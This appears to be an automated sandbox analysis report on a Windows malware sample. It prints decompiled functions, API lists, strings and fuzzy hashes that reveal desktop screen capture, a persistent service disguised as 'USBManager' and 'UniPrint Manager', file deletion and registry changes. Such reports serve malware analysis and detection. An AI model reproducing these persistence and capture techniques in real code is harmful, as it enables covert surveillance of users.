                                                                                                                        0x6f3367fe
                                                                                                                        0x6f336804
                                                                                                                        0x6f336805
                                                                                                                        0x6f336816
                                                                                                                        0x6f33685a
                                                                                                                        0x6f33685a
                                                                                                                        0x6f3367fc
                                                                                                                        0x6f336864
                                                                                                                        0x6f33686a
                                                                                                                        0x6f33686e
                                                                                                                        0x6f336874
                                                                                                                        0x6f336875
                                                                                                                        0x6f33687a
                                                                                                                        0x6f33687b
                                                                                                                        0x6f336886
                                                                                                                        0x6f33688c
                                                                                                                        0x6f336895
                                                                                                                        0x6f336896
                                                                                                                        0x6f3368a0
                                                                                                                        0x6f3368a9
                                                                                                                        0x6f3368aa
                                                                                                                        0x6f3368af
                                                                                                                        0x6f3368b5
                                                                                                                        0x6f3368be
                                                                                                                        0x6f3368ce
                                                                                                                        0x6f3368d4
                                                                                                                        0x6f3368d8
                                                                                                                        0x6f3368de
                                                                                                                        0x6f3368e4
                                                                                                                        0x6f3368e5
                                                                                                                        0x6f3368ef
                                                                                                                        0x6f3368f1
                                                                                                                        0x6f3368f5
                                                                                                                        0x6f336903
                                                                                                                        0x6f336905
                                                                                                                        0x6f336906
                                                                                                                        0x6f336907
                                                                                                                        0x6f33690c
                                                                                                                        0x6f33696c
                                                                                                                        0x6f336974
                                                                                                                        0x6f33690e
                                                                                                                        0x6f33690e
                                                                                                                        0x6f336912
                                                                                                                        0x6f336968
                                                                                                                        0x6f336968
                                                                                                                        0x00000000
                                                                                                                        0x6f336914
                                                                                                                        0x6f336914
                                                                                                                        0x6f33691a
                                                                                                                        0x6f33691f
                                                                                                                        0x6f336926
                                                                                                                        0x6f336927
                                                                                                                        0x6f336928
                                                                                                                        0x6f336934
                                                                                                                        0x00000000
                                                                                                                        0x00000000
                                                                                                                        0x6f336936
                                                                                                                        0x6f33693c
                                                                                                                        0x6f33693e
                                                                                                                        0x6f336942
                                                                                                                        0x00000000
                                                                                                                        0x00000000
                                                                                                                        0x6f336942
                                                                                                                        0x00000000
                                                                                                                        0x6f33693c
                                                                                                                        0x6f336946
                                                                                                                        0x00000000
                                                                                                                        0x6f336948
                                                                                                                        0x6f336956
                                                                                                                        0x6f336958
                                                                                                                        0x6f33695c
                                                                                                                        0x6f33695e
                                                                                                                        0x6f33695e
                                                                                                                        0x6f336946
                                                                                                                        0x6f336912
                                                                                                                        0x6f33690c
                                                                                                                        0x6f3368d8
                                                                                                                        0x6f3368be
                                                                                                                        0x6f3368af
                                                                                                                        0x6f336980
                                                                                                                        0x6f336980
                                                                                                                        0x6f336982
                                                                                                                        0x6f336982
                                                                                                                        0x6f336987
                                                                                                                        0x6f336987
                                                                                                                        0x6f336992
                                                                                                                        0x6f336998
                                                                                                                        0x6f33699d
                                                                                                                        0x6f3369a0
                                                                                                                        0x6f3369b2
                                                                                                                        0x6f336715
                                                                                                                        0x6f336715
                                                                                                                        0x6f336715

                                                                                                                        APIs
                                                                                                                        • GetDesktopWindow.USER32 ref: 6F3366F0
                                                                                                                        • GetDC.USER32(00000000), ref: 6F3366FD
                                                                                                                        • CreateCompatibleDC.GDI32(00000000), ref: 6F336717
                                                                                                                        • RtlZeroMemory.NTDLL(?,00000010), ref: 6F336732
                                                                                                                        • GetWindowRect.USER32 ref: 6F33673D
                                                                                                                        • CreateCompatibleBitmap.GDI32(00000000,?,?), ref: 6F336752
                                                                                                                        • SelectObject.GDI32(?,00000000), ref: 6F33676C
                                                                                                                        • BitBlt.GDI32(?,?,?,?,?,00000000,00000000,00000000,40CC0020), ref: 6F33679E
                                                                                                                        • RtlZeroMemory.NTDLL(?,00000014), ref: 6F3367B3
                                                                                                                        • GetCursorInfo.USER32(?,?,?,?,?,?,?,?,?,?,00000014), ref: 6F3367C5
                                                                                                                        • RtlZeroMemory.NTDLL(?,00000014), ref: 6F3367E5
                                                                                                                        • GetIconInfo.USER32(?,?), ref: 6F3367F4
                                                                                                                        • RtlZeroMemory.NTDLL(?,00000018), ref: 6F336805
                                                                                                                        • GetObjectA.GDI32(?,00000018,?), ref: 6F336816
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000003.00000002.754490413.000000006F331000.00000020.00020000.sdmp, Offset: 6F330000, based on PE: true
                                                                                                                        • Associated: 00000003.00000002.754474115.000000006F330000.00000002.00020000.sdmp Download File
                                                                                                                        • Associated: 00000003.00000002.754512937.000000006F33D000.00000002.00020000.sdmp Download File
                                                                                                                        • Associated: 00000003.00000002.754530015.000000006F340000.00000004.00020000.sdmp Download File
                                                                                                                        • Associated: 00000003.00000002.754546355.000000006F341000.00000002.00020000.sdmp Download File
                                                                                                                        Similarity
                                                                                                                        • API ID: MemoryZero$CompatibleCreateInfoObjectWindow$BitmapCursorDesktopIconRectSelect
                                                                                                                        • String ID:
                                                                                                                        • API String ID: 3821519111-0
                                                                                                                        • Opcode ID: f2972d9751e82e47922c31759095ead73aaa2a843e33c28de46479fdfd7f13d2
                                                                                                                        • Instruction ID: 5edd4008e85c71a6e05d28f4fc7243db9f12e416d3f7eefce464569818c76a71
                                                                                                                        • Opcode Fuzzy Hash: f2972d9751e82e47922c31759095ead73aaa2a843e33c28de46479fdfd7f13d2
                                                                                                                        • Instruction Fuzzy Hash: CE818A72604395AFD720DF64C884F6BB7E9AB8AB54F00490DFA8497284DB71E805CB62
                                                                                                                        Uniqueness

                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                        Function 6F337F10, Relevance: 26.4, APIs: 12, Strings: 3, Instructions: 125memoryCOMMON
                                                                                                                        Download Yara Rule
                                                                                                                        C-Code - Quality: 57%
                                                                                                                        			E6F337F10(void* __ebp, struct HINSTANCE__* _a4, intOrPtr _a8, intOrPtr _a12, intOrPtr _a16, struct HWND__* _a20) {
				void* _t7;
				struct HWND__* _t8;
				struct HWND__* _t11;
				void* _t16;
				struct HWND__* _t26;
				intOrPtr _t29;
				intOrPtr _t31;
				void* _t33;
				void* _t35;
				struct HINSTANCE__* _t40;
				struct HWND__* _t41;
				void* _t45;
				void* _t46;
				void* _t47;

				_t45 = __ebp;
				_t29 = _a8;
				if(_t29 == 0x275b || _t29 == 0x2755 || _t29 == 0x2ae1) {
					__eflags = 0;
					return 0;
				} else {
					_t40 = _a4;
					_t7 = E6F334E50(_t40, _t29);
					_t47 = _t46 + 8;
					_t35 = _t7;
					_t8 = _a20;
					_push(_t8);
					_push(_a16);
					_push(_a12);
					if(_t35 == 0) {
						_push(_t29);
						_push(_t40);
						M6F3405E8();
						_t41 = _t8;
					} else {
						_t26 = CreateDialogIndirectParamW(_t40, _t35, ??, ??, ??); // executed
						_t41 = _t26;
						HeapFree(GetProcessHeap(), 0, _t35);
					}
					if(_t41 == 0) {
						L17:
						return _t41;
					} else {
						SetWindowTextA(_t41, 0x6f33d664); // executed
						if(_t29 != 0x2872) {
							__eflags = _t29 - 0x2768;
							if(_t29 != 0x2768) {
								goto L17;
							} else {
								_t11 = GetDlgItem(_t41, 0x4e7d);
								_push(0);
								_push(0);
								__eflags = _t11;
								if(_t11 == 0) {
									PostMessageA(_t41, 0x10, ??, ??);
									goto L17;
								} else {
									PostMessageA(_t11, 0xf5, ??, ??);
									return _t41;
								}
							}
						} else {
							_t56 = M6F3404B4;
							if(M6F3404B4 != 0) {
								E6F3352B0(_t45, 1);
								_t47 = _t47 + 4;
								ExitProcess(0);
							}
							_push(0);
							E6F3328B0(".pdll");
							_t16 = M6F340534; // 0xa563b0
							_t31 = M6F340544; // 0x1
							_push(0);
							_push(L"Printer manager");
							M6F340540 = E6F334C30(_t31, _t16, L"UniPrint Manager");
							M6F34050C = E6F333C60();
							E6F334CA0(_t56, 0);
							if(M6F3404AC != 0) {
								_t33 = M6F340534; // 0xa563b0
								_push(0xffffffff);
								E6F333610(_t33);
								ExitProcess(0);
							}
							 *0x6f340398 = _t41;
							CallWindowProcW(E6F337790, _t41, 0x83fc, GetWindowLongW(_t41, 0xfffffffc), 0); // executed
							SetWindowLongW(_t41, 0xfffffffc, E6F337790);
							return _t41;
						}
					}
				}
			}

















                                                                                                                        0x6f337f10
                                                                                                                        0x6f337f11
                                                                                                                        0x6f337f1b
                                                                                                                        0x6f33809e
                                                                                                                        0x6f3380a1
                                                                                                                        0x6f337f39
                                                                                                                        0x6f337f3a
                                                                                                                        0x6f337f41
                                                                                                                        0x6f337f4e
                                                                                                                        0x6f337f51
                                                                                                                        0x6f337f53
                                                                                                                        0x6f337f57
                                                                                                                        0x6f337f58
                                                                                                                        0x6f337f59
                                                                                                                        0x6f337f5c
                                                                                                                        0x6f337f7a
                                                                                                                        0x6f337f7b
                                                                                                                        0x6f337f7c
                                                                                                                        0x6f337f82
                                                                                                                        0x6f337f5e
                                                                                                                        0x6f337f60
                                                                                                                        0x6f337f69
                                                                                                                        0x6f337f72
                                                                                                                        0x6f337f72
                                                                                                                        0x6f337f86
                                                                                                                        0x6f338096
                                                                                                                        0x6f33809b
                                                                                                                        0x6f337f8c
                                                                                                                        0x6f337f92
                                                                                                                        0x6f337f9e
                                                                                                                        0x6f33805d
                                                                                                                        0x6f338063
                                                                                                                        0x00000000
                                                                                                                        0x6f338065
                                                                                                                        0x6f33806b
                                                                                                                        0x6f338071
                                                                                                                        0x6f338073
                                                                                                                        0x6f338075
                                                                                                                        0x6f338077
                                                                                                                        0x6f338090
                                                                                                                        0x00000000
                                                                                                                        0x6f338079
                                                                                                                        0x6f33807f
                                                                                                                        0x6f33808a
                                                                                                                        0x6f33808a
                                                                                                                        0x6f338077
                                                                                                                        0x6f337fa4
                                                                                                                        0x6f337fa4
                                                                                                                        0x6f337fab
                                                                                                                        0x6f337faf
                                                                                                                        0x6f337fb4
                                                                                                                        0x6f337fb9
                                                                                                                        0x6f337fb9
                                                                                                                        0x6f337fbf
                                                                                                                        0x6f337fc6
                                                                                                                        0x6f337fcb
                                                                                                                        0x6f337fd0
                                                                                                                        0x6f337fd6
                                                                                                                        0x6f337fd8
                                                                                                                        0x6f337fe9
                                                                                                                        0x6f337ff5
                                                                                                                        0x6f337ffa
                                                                                                                        0x6f338009
                                                                                                                        0x6f33800b
                                                                                                                        0x6f338011
                                                                                                                        0x6f338014
                                                                                                                        0x6f33801e
                                                                                                                        0x6f33801e
                                                                                                                        0x6f338029
                                                                                                                        0x6f338041
                                                                                                                        0x6f33804f
                                                                                                                        0x6f33805a
                                                                                                                        0x6f33805a
                                                                                                                        0x6f337f9e
                                                                                                                        0x6f337f86

                                                                                                                        APIs
                                                                                                                          • Part of subcall function 6F334E50: FindResourceW.KERNEL32(?,?,00000005), ref: 6F334E61
                                                                                                                          • Part of subcall function 6F334E50: LoadResource.KERNEL32(?,00000000), ref: 6F334E70
                                                                                                                          • Part of subcall function 6F334E50: SizeofResource.KERNEL32(?,00000000), ref: 6F334E7E
                                                                                                                          • Part of subcall function 6F334E50: LockResource.KERNEL32(00000000), ref: 6F334E87
                                                                                                                          • Part of subcall function 6F334E50: GetProcessHeap.KERNEL32(00000008,00000000), ref: 6F334E96
                                                                                                                          • Part of subcall function 6F334E50: HeapAlloc.KERNEL32(00000000), ref: 6F334E9D
                                                                                                                          • Part of subcall function 6F334E50: RtlMoveMemory.NTDLL(00000000,00000000,00000000), ref: 6F334EA8
                                                                                                                          • Part of subcall function 6F334E50: FreeResource.KERNEL32(00000000), ref: 6F334ED7
                                                                                                                        • CreateDialogIndirectParamW.USER32 ref: 6F337F60
                                                                                                                        • GetProcessHeap.KERNEL32(00000000,00000000), ref: 6F337F6B
                                                                                                                        • HeapFree.KERNEL32(00000000), ref: 6F337F72
                                                                                                                          • Part of subcall function 6F3328B0: RtlZeroMemory.NTDLL(00000140,00000140), ref: 6F3328C2
                                                                                                                          • Part of subcall function 6F3328B0: RtlZeroMemory.NTDLL(?,00000208), ref: 6F3328D4
                                                                                                                          • Part of subcall function 6F3328B0: wsprintfA.USER32 ref: 6F3328F3
                                                                                                                          • Part of subcall function 6F3328B0: wsprintfA.USER32 ref: 6F332911
                                                                                                                          • Part of subcall function 6F3328B0: FindFirstFileA.KERNEL32(?,?), ref: 6F332923
                                                                                                                          • Part of subcall function 6F3328B0: lstrcmpA.KERNEL32(?,6F33D538,00000000,?), ref: 6F332950
                                                                                                                          • Part of subcall function 6F3328B0: lstrcmpA.KERNEL32(?,6F33D534), ref: 6F332960
                                                                                                                          • Part of subcall function 6F3328B0: lstrcatA.KERNEL32(?,?), ref: 6F332973
                                                                                                                          • Part of subcall function 6F3328B0: DeleteFileA.KERNEL32(?), ref: 6F33298C
                                                                                                                          • Part of subcall function 6F3328B0: FindNextFileA.KERNEL32(00000000,?), ref: 6F3329AD
                                                                                                                          • Part of subcall function 6F3328B0: FindClose.KERNEL32(00000000), ref: 6F3329B8
                                                                                                                          • Part of subcall function 6F333C60: OpenSCManagerA.ADVAPI32(00000000,00000000,000F003F), ref: 6F333C7E
                                                                                                                          • Part of subcall function 6F333C60: OpenSCManagerA.ADVAPI32(00000000,00000000,00000001), ref: 6F333C8C
                                                                                                                          • Part of subcall function 6F333C60: OpenServiceA.ADVAPI32(00000000,USBManager,000F01FF), ref: 6F333CAA
                                                                                                                          • Part of subcall function 6F333C60: wsprintfA.USER32 ref: 6F333CEF
                                                                                                                          • Part of subcall function 6F333C60: CreateServiceA.ADVAPI32(?,USBManager,USB Ports Manager,000F01FF,00000020,00000002,00000000,?,00000000,00000000,00000000,00000000,00000000), ref: 6F333D1E
                                                                                                                          • Part of subcall function 6F333C60: ChangeServiceConfig2A.ADVAPI32 ref: 6F333D74
                                                                                                                          • Part of subcall function 6F333C60: wsprintfA.USER32 ref: 6F333D95
                                                                                                                          • Part of subcall function 6F334CA0: wsprintfA.USER32 ref: 6F334CEC
                                                                                                                          • Part of subcall function 6F334CA0: GetProcessHeap.KERNEL32(00000000,00000000,00000000,?), ref: 6F334CF9
                                                                                                                          • Part of subcall function 6F334CA0: HeapFree.KERNEL32(00000000), ref: 6F334CFC
                                                                                                                          • Part of subcall function 6F334CA0: RegCreateKeyExA.KERNEL32(80000001,?,00000000,00000000,00000000,000F023F,00000000,?,00000000), ref: 6F334D1F
                                                                                                                          • Part of subcall function 6F334CA0: RegDeleteValueA.ADVAPI32(?,00A32C55), ref: 6F334D42
                                                                                                                          • Part of subcall function 6F334CA0: RegCloseKey.ADVAPI32(?), ref: 6F334E3C
                                                                                                                        • SetWindowTextA.USER32(00000000,6F33D664), ref: 6F337F92
                                                                                                                        • ExitProcess.KERNEL32 ref: 6F337FB9
                                                                                                                        • ExitProcess.KERNEL32 ref: 6F33801E
                                                                                                                        • GetWindowLongW.USER32(00000000,000000FC), ref: 6F33802F
                                                                                                                        • CallWindowProcW.USER32(Function_00007790,00000000,000083FC,00000000), ref: 6F338041
                                                                                                                        • SetWindowLongW.USER32 ref: 6F33804F
                                                                                                                          • Part of subcall function 6F333610: CreateEnvironmentBlock.USERENV ref: 6F333641
                                                                                                                          • Part of subcall function 6F333610: RtlZeroMemory.NTDLL(?,00000044), ref: 6F33365B
                                                                                                                          • Part of subcall function 6F333610: RtlZeroMemory.NTDLL ref: 6F333677
                                                                                                                          • Part of subcall function 6F333610: CreateProcessAsUserW.ADVAPI32(00000000,00000000,?,00000000,00000000,00000000,00000020,?,00000000,?,00000020,?,?,?,00000010,?), ref: 6F3336A6
                                                                                                                          • Part of subcall function 6F333610: Sleep.KERNEL32(000001F4,?,?,?,00000010,?,00000044,00000000), ref: 6F3336B1
                                                                                                                          • Part of subcall function 6F333610: DestroyEnvironmentBlock.USERENV(?,?,00000010,?,00000044,00000000), ref: 6F3336E4
                                                                                                                          • Part of subcall function 6F333610: CloseHandle.KERNEL32(00000000,?,00000010,?,00000044,00000000), ref: 6F3336EA
                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000003.00000002.754490413.000000006F331000.00000020.00020000.sdmp, Offset: 6F330000, based on PE: true
                                                                                                                        • Associated: 00000003.00000002.754474115.000000006F330000.00000002.00020000.sdmp Download File
                                                                                                                        • Associated: 00000003.00000002.754512937.000000006F33D000.00000002.00020000.sdmp Download File
                                                                                                                        • Associated: 00000003.00000002.754530015.000000006F340000.00000004.00020000.sdmp Download File
                                                                                                                        • Associated: 00000003.00000002.754546355.000000006F341000.00000002.00020000.sdmp Download File
                                                                                                                        Similarity
                                                                                                                        • API ID: HeapProcess$CreateMemoryResourcewsprintf$FindWindowZero$CloseFileFreeOpenService$BlockDeleteEnvironmentExitLongManagerlstrcmp$AllocCallChangeConfig2DestroyDialogFirstHandleIndirectLoadLockMoveNextParamProcSizeofSleepTextUserValuelstrcat
                                                                                                                        • String ID: .pdll$Printer manager$UniPrint Manager
                                                                                                                        • API String ID: 2623091544-3698302044
                                                                                                                        • Opcode ID: 2dda20ddb9e3a5e4c6f93f7d993a011760b35b1ea0e7c07fd96946657ab8e5f8
                                                                                                                        • Instruction ID: 5ac0fd2c4ae1d0d529d9b13a194f54f51ff00cb1a03183b8a530f83bacc646c9
                                                                                                                        • Opcode Fuzzy Hash: 2dda20ddb9e3a5e4c6f93f7d993a011760b35b1ea0e7c07fd96946657ab8e5f8
                                                                                                                        • Instruction Fuzzy Hash: 30312773E08BB4BBDA20D7648C48F9B766CEB46732F10411AF614E61C0CB759821CBA5
                                                                                                                        Uniqueness

                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                        Function 004C5619, Relevance: 24.7, APIs: 6, Strings: 8, Instructions: 203COMMON
                                                                                                                        Download Yara Rule
                                                                                                                        APIs
                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000003.00000002.747256468.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                        • Associated: 00000003.00000002.747207388.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                                        • Associated: 00000003.00000002.749415979.0000000000733000.00000002.00020000.sdmp Download File
                                                                                                                        • Associated: 00000003.00000002.749762818.0000000000805000.00000004.00020000.sdmp Download File
                                                                                                                        • Associated: 00000003.00000002.749786800.0000000000807000.00000008.00020000.sdmp Download File
                                                                                                                        • Associated: 00000003.00000002.749814867.000000000080B000.00000004.00020000.sdmp Download File
                                                                                                                        • Associated: 00000003.00000002.749828681.000000000080C000.00000008.00020000.sdmp Download File
                                                                                                                        • Associated: 00000003.00000002.749850510.000000000080D000.00000004.00020000.sdmp Download File
                                                                                                                        • Associated: 00000003.00000002.749873568.000000000080F000.00000008.00020000.sdmp Download File
                                                                                                                        • Associated: 00000003.00000002.749896361.0000000000810000.00000004.00020000.sdmp Download File
                                                                                                                        • Associated: 00000003.00000002.749924742.0000000000813000.00000008.00020000.sdmp Download File
                                                                                                                        • Associated: 00000003.00000002.749958556.0000000000817000.00000004.00020000.sdmp Download File
                                                                                                                        • Associated: 00000003.00000002.749980954.0000000000818000.00000008.00020000.sdmp Download File
                                                                                                                        • Associated: 00000003.00000002.750019968.0000000000822000.00000004.00020000.sdmp Download File
                                                                                                                        • Associated: 00000003.00000002.750062782.0000000000823000.00000008.00020000.sdmp Download File
                                                                                                                        • Associated: 00000003.00000002.750089388.0000000000826000.00000004.00020000.sdmp Download File
                                                                                                                        • Associated: 00000003.00000002.750421700.00000000008B2000.00000002.00020000.sdmp Download File
                                                                                                                        Similarity
                                                                                                                        • API ID: H_prolog3_catch_memset
                                                                                                                        • String ID: MC.isComm.0$MC.isComm.1$MC.isComm.DQuery.Failed: $MC.isComm.GetProc.Failed$MC.isComm.LoadLib.Failed$NetApiBufferFree$NetWkstaUserGetInfo$Netapi32.dll
                                                                                                                        • API String ID: 1022661273-605090514
                                                                                                                        • Opcode ID: 5ee0d5c17be2d8591c5ea548fc123e854c8b9a7f167a230a8665f9cb4ce978c0
                                                                                                                        • Instruction ID: b988314c8f855af6d4c6c856e78e5bae139b399f43f535e92076c94569f55319
                                                                                                                        • Opcode Fuzzy Hash: 5ee0d5c17be2d8591c5ea548fc123e854c8b9a7f167a230a8665f9cb4ce978c0
                                                                                                                        • Instruction Fuzzy Hash: 3E71D774D05288EEDF10EBA5C946BEEBFB4AF55304F14406EE00167281D77C2B48DBA6
                                                                                                                        Uniqueness

                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                        Function 6F33BBBE, Relevance: 22.9, APIs: 11, Strings: 2, Instructions: 124sleepCOMMON
                                                                                                                        Download Yara Rule
                                                                                                                        C-Code - Quality: 56%
                                                                                                                        			E6F33BBBE(intOrPtr _a4, long _a8, intOrPtr _a12) {
				void* __ebx;
				void* __edi;
				void* __esi;
				void* __ebp;
				void* _t12;
				void* _t13;
				void* _t14;
				void* _t16;
				long _t20;
				void* _t22;
				long _t24;
				void* _t26;
				long _t36;
				signed int _t38;
				void* _t39;
				char _t43;

				if(_a8 != 0) {
					__eflags = _a8 - 1;
					if(_a8 != 1) {
						L33:
						return 1;
					}
					_t24 =  *( *[fs:0x18] + 4);
					_a8 = 0;
					_push(0);
					while(1) {
						_t12 = InterlockedCompareExchange(0x6f340964, _t24, ??);
						__eflags = _t12;
						if(_t12 == 0) {
							break;
						}
						__eflags = _t12 - _t24;
						if(_t12 == _t24) {
							_a8 = 1;
							L11:
							_t13 =  *0x6f340960; // 0x2
							_t36 = 2;
							__eflags = _t13;
							if(_t13 == 0) {
								 *0x6f340960 = 1; // executed
								_t14 = E6F33BB78(0x6f33d47c, 0x6f33d484); // executed
								__eflags = _t14;
								if(_t14 != 0) {
									L3:
									return 0;
								}
								_push(0x6f33d478);
								_push(0x6f33d474);
								L6F33C0B0();
								 *0x6f340960 = _t36;
								L15:
								__eflags = _a8;
								if(_a8 == 0) {
									InterlockedExchange(0x6f340964, 0);
								}
								__eflags =  *0x6f340974; // 0x0
								if(__eflags != 0) {
									_push(0x6f340974);
									_t16 = E6F33C044(0, _t36, 0x6f340964, __eflags);
									__eflags = _t16;
									if(_t16 != 0) {
										 *0x6f340974(_a4, _t36, _a12);
									}
								}
								"mlns=\"urn:schemas-microsoft-com:asm.v1\" manifestVersion=\"1.0\">\r\n  <trustInfo xmlns=\"urn:schemas-microsoft-com:asm.v3\">\r\n    <security>\r\n      <requestedPrivileges>\r\n        <requestedExecutionLevel level=\"asInvoker\" uiAccess=\"false\"></requestedExecutionLevel>\r\n      </requestedPrivileges>\r\n    </security>\r\n  </trustInfo>\r\n<assemblyIdentity type=\"win32\" name=\"Microsoft.Windows.Common-Controls\" version=\"6.0.0.0\" processorArchitecture=\"x86\" />\r\n<dependency>\r\n    <dependentAssembly>\r\n        <assemblyIdentity\r\n            type=\"win32\"\r\n            name=\"Microsoft.Windows.Common-Controls\"\r\n            version=\"6.0.0.0\"\r\n            processorArchitecture=\"x86\"\r\n            publicKeyToken=\"6595b64144ccf1df\"\r\n            language=\"*\"\r\n        />\r\n    </dependentAssembly>\r\n</dependency>\r\n</assembly>PAD" = "mlns=\"urn:schemas-microsoft-com:asm.v1\" manifestVersion=\"1.0\">\r\n  <trustInfo xmlns=\"urn:schemas-microsoft-com:asm.v3\">\r\n    <security>\r\n      <requestedPrivileges>\r\n        <requestedExecutionLevel level=\"asInvoker\" uiAccess=\"false\"></requestedExecutionLevel>\r\n      </requestedPrivileges>\r\n    </security>\r\n  </trustInfo>\r\n<assemblyIdentity type=\"win32\" name=\"Microsoft.Windows.Common-Controls\" version=\"6.0.0.0\" processorArchitecture=\"x86\" />\r\n<dependency>\r\n    <dependentAssembly>\r\n        <assemblyIdentity\r\n            type=\"win32\"\r\n            name=\"Microsoft.Windows.Common-Controls\"\r\n            version=\"6.0.0.0\"\r\n            processorArchitecture=\"x86\"\r\n            publicKeyToken=\"6595b64144ccf1df\"\r\n            language=\"*\"\r\n        />\r\n    </dependentAssembly>\r\n</dependency>\r\n</assembly>PAD" + 1;
								goto L33;
							}
							_push(0x1f);
							L6F33C0B6();
							goto L15;
						}
						Sleep(0x3e8);
						_push(0);
					}
					goto L11;
				}
				_t43 = "mlns=\"urn:schemas-microsoft-com:asm.v1\" manifestVersion=\"1.0\">\r\n  <trustInfo xmlns=\"urn:schemas-microsoft-com:asm.v3\">\r\n    <security>\r\n      <requestedPrivileges>\r\n        <requestedExecutionLevel level=\"asInvoker\" uiAccess=\"false\"></requestedExecutionLevel>\r\n      </requestedPrivileges>\r\n    </security>\r\n  </trustInfo>\r\n<assemblyIdentity type=\"win32\" name=\"Microsoft.Windows.Common-Controls\" version=\"6.0.0.0\" processorArchitecture=\"x86\" />\r\n<dependency>\r\n    <dependentAssembly>\r\n        <assemblyIdentity\r\n            type=\"win32\"\r\n            name=\"Microsoft.Windows.Common-Controls\"\r\n            version=\"6.0.0.0\"\r\n            processorArchitecture=\"x86\"\r\n            publicKeyToken=\"6595b64144ccf1df\"\r\n            language=\"*\"\r\n        />\r\n    </dependentAssembly>\r\n</dependency>\r\n</assembly>PAD"; // 0x1
				if(_t43 <= 0) {
					goto L3;
				}
				"mlns=\"urn:schemas-microsoft-com:asm.v1\" manifestVersion=\"1.0\">\r\n  <trustInfo xmlns=\"urn:schemas-microsoft-com:asm.v3\">\r\n    <security>\r\n      <requestedPrivileges>\r\n        <requestedExecutionLevel level=\"asInvoker\" uiAccess=\"false\"></requestedExecutionLevel>\r\n      </requestedPrivileges>\r\n    </security>\r\n  </trustInfo>\r\n<assemblyIdentity type=\"win32\" name=\"Microsoft.Windows.Common-Controls\" version=\"6.0.0.0\" processorArchitecture=\"x86\" />\r\n<dependency>\r\n    <dependentAssembly>\r\n        <assemblyIdentity\r\n            type=\"win32\"\r\n            name=\"Microsoft.Windows.Common-Controls\"\r\n            version=\"6.0.0.0\"\r\n            processorArchitecture=\"x86\"\r\n            publicKeyToken=\"6595b64144ccf1df\"\r\n            language=\"*\"\r\n        />\r\n    </dependentAssembly>\r\n</dependency>\r\n</assembly>PAD" = "mlns=\"urn:schemas-microsoft-com:asm.v1\" manifestVersion=\"1.0\">\r\n  <trustInfo xmlns=\"urn:schemas-microsoft-com:asm.v3\">\r\n    <security>\r\n      <requestedPrivileges>\r\n        <requestedExecutionLevel level=\"asInvoker\" uiAccess=\"false\"></requestedExecutionLevel>\r\n      </requestedPrivileges>\r\n    </security>\r\n  </trustInfo>\r\n<assemblyIdentity type=\"win32\" name=\"Microsoft.Windows.Common-Controls\" version=\"6.0.0.0\" processorArchitecture=\"x86\" />\r\n<dependency>\r\n    <dependentAssembly>\r\n        <assemblyIdentity\r\n            type=\"win32\"\r\n            name=\"Microsoft.Windows.Common-Controls\"\r\n            version=\"6.0.0.0\"\r\n            processorArchitecture=\"x86\"\r\n            publicKeyToken=\"6595b64144ccf1df\"\r\n            language=\"*\"\r\n        />\r\n    </dependentAssembly>\r\n</dependency>\r\n</assembly>PAD" - 1;
				_push(0);
				while(InterlockedCompareExchange(0x6f340964, 1, ??) != 0) {
					Sleep(0x3e8);
					_push(0);
				}
				_t20 =  *0x6f340960; // 0x2
				if(_t20 == 2) {
					_t26 =  *0x6f34096c; // 0xc06600
					__eflags = _t26;
					if(_t26 == 0) {
						L32:
						 *0x6f340960 = 0;
						InterlockedExchange(0x6f340964, 0);
						goto L33;
					}
					_t38 =  *0x6f340968; // 0xc06600
					_t39 = _t38 + 0xfffffffc;
					while(1) {
						__eflags = _t39 - _t26;
						if(_t39 < _t26) {
							break;
						}
						_t22 =  *_t39;
						__eflags = _t22;
						if(_t22 != 0) {
							 *_t22();
						}
						_t39 = _t39 - 4;
						__eflags = _t39;
					}
					free(_t26);
					 *0x6f340968 =  *0x6f340968 & 0x00000000;
					 *0x6f34096c =  *0x6f34096c & 0x00000000;
					__eflags =  *0x6f34096c;
					goto L32;
				}
				_push(0x1f);
				L6F33C0B6();
				goto L33;
			}



















                                                                                                                        0x6f33bbcb
                                                                                                                        0x6f33bbf3
                                                                                                                        0x6f33bbf7
                                                                                                                        0x6f33bd3b
                                                                                                                        0x00000000
                                                                                                                        0x6f33bd3d
                                                                                                                        0x6f33bc04
                                                                                                                        0x6f33bc0d
                                                                                                                        0x6f33bc10
                                                                                                                        0x6f33bc29
                                                                                                                        0x6f33bc2b
                                                                                                                        0x6f33bc2d
                                                                                                                        0x6f33bc2f
                                                                                                                        0x00000000
                                                                                                                        0x00000000
                                                                                                                        0x6f33bc18
                                                                                                                        0x6f33bc1a
                                                                                                                        0x6f33bc33
                                                                                                                        0x6f33bc3a
                                                                                                                        0x6f33bc3a
                                                                                                                        0x6f33bc41
                                                                                                                        0x6f33bc42
                                                                                                                        0x6f33bc44
                                                                                                                        0x6f33bc59
                                                                                                                        0x6f33bc63
                                                                                                                        0x6f33bc6a
                                                                                                                        0x6f33bc6c
                                                                                                                        0x6f33bbec
                                                                                                                        0x00000000
                                                                                                                        0x6f33bbec
                                                                                                                        0x6f33bc72
                                                                                                                        0x6f33bc77
                                                                                                                        0x6f33bc7c
                                                                                                                        0x6f33bc82
                                                                                                                        0x6f33bc88
                                                                                                                        0x6f33bc8b
                                                                                                                        0x6f33bc8e
                                                                                                                        0x6f33bc92
                                                                                                                        0x6f33bc92
                                                                                                                        0x6f33bc98
                                                                                                                        0x6f33bc9e
                                                                                                                        0x6f33bca0
                                                                                                                        0x6f33bca5
                                                                                                                        0x6f33bcab
                                                                                                                        0x6f33bcad
                                                                                                                        0x6f33bcb6
                                                                                                                        0x6f33bcb6
                                                                                                                        0x6f33bcad
                                                                                                                        0x6f33bcbc
                                                                                                                        0x00000000
                                                                                                                        0x6f33bcbc
                                                                                                                        0x6f33bc46
                                                                                                                        0x6f33bc48
                                                                                                                        0x00000000
                                                                                                                        0x6f33bc48
                                                                                                                        0x6f33bc21
                                                                                                                        0x6f33bc27
                                                                                                                        0x6f33bc27
                                                                                                                        0x00000000
                                                                                                                        0x6f33bc31
                                                                                                                        0x6f33bbcd
                                                                                                                        0x6f33bbd3
                                                                                                                        0x00000000
                                                                                                                        0x00000000
                                                                                                                        0x6f33bbd5
